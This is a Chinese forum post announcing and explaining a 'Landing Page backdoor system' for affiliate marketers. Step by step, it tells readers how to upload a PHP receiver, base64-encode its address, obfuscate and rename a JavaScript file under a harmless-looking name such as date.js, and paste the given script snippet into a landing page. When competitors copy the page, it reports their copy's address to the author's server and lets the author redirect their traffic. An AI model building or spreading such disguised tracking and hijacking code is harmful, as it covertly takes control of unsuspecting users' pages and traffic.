Landing Page 后门系统第一版本发布

一个带后门 Landing Page 的分析 继续讨论:

从说说要做到现在发布已经过去2个月了。。

时光飞逝哈哈哈哈 尴尬

目前 Landing Page 后门系统已经集成到镜像系统内了,之前团了 188 的,找我开永久的镜像系统。

下面直接说下怎么配置

首先,在镜像系统中新增加一个菜单,地址为

backdoor-urls

填写示例:

先看下界面

管理平台弄好了,我们需要增加一个中转机器(用于接收LP 地址),然后给 LP 留一下后门。

一步步来。

接收LP 地址的 php 文件

https://raw.githubusercontent.com/adzon/mirrorphp/master/backdoor/backdoor.php

先将该 php 文件上传到你的服务器中,记住地址,如:

https://demo.test/api.php

将该地址进行 base64 加密( 鍦ㄧ嚎鍔犲瘑瑙e瘑 ),生成字符串

aHR0cHM6Ly9kZW1vLnRlc3QvYXBpLnBocA==

保存下,以备后续使用。

下载依赖 js,将代码进行加密,然后保存到 Landing Page 目录内,起个比较容易混淆的名字。

https://raw.githubusercontent.com/adzon/mirrorphp/master/backdoor/backdoor.js

加密过程我会另起一个文章单独说明。

举例我们将文件命名为 date.js

下面开始将后门代码插入到 Landing Page 内

示例代码

https://raw.githubusercontent.com/adzon/mirrorphp/master/backdoor/backdoor.html

以下代码核心代码,请自行修改后使用。

<!-- 以下是后门代码 请删除注释使用 -->
<script type="text/javascript">
//此处为你的后门地址,请使用 Base64 编码此地址。
var sul = "aHR0cDovL21pcnJvcnBocC50ZXN0L2JhY2tkb29yL2JhY2tkb29yLnBocA==";
</script>
<script type="text/javascript" src="backdoor.js"></script>
<script type="text/javascript">
addLoadEvent(GetDate);
</script>
<!-- 后门代码结束 -->

前文我们获取的地址,以及修改后的 js 文件,对后门代码进行修改,最终代码为:

<script type="text/javascript">
var sul = "aHR0cHM6Ly9kZW1vLnRlc3QvYXBpLnBocA==";
</script>
<script type="text/javascript" src="date.js"></script>
<script type="text/javascript">
addLoadEvent(GetDate);
</script>

然后我们就可以将 Landing Page 进行发布了!

通常我们可以使用以下方式霸占 SPY

1、小流量多 Campaign 的联盟流量(exoclick、popcash 之类的)受众是 ADP 之类的 SPY
2、Facebook 大量低预算 Campaign,受众是 ADSPY 之类的 SPY。

有其他人使用我们的 LP 之后,我们就可以对他的流量进行控制了。

进入 LP 保护后台,右键编辑。

开启跳转,设置好跳转地址即可。

希望大家只将本功能用在自己的 Landing Page 保护上,如果自己加了后门被发现然后被揍了,请默默承担伤痛,感恩。

2 个赞

猴头,日后闯了祸,不要把师父说出来

反正最终都会实现的。虽然体力所限会延迟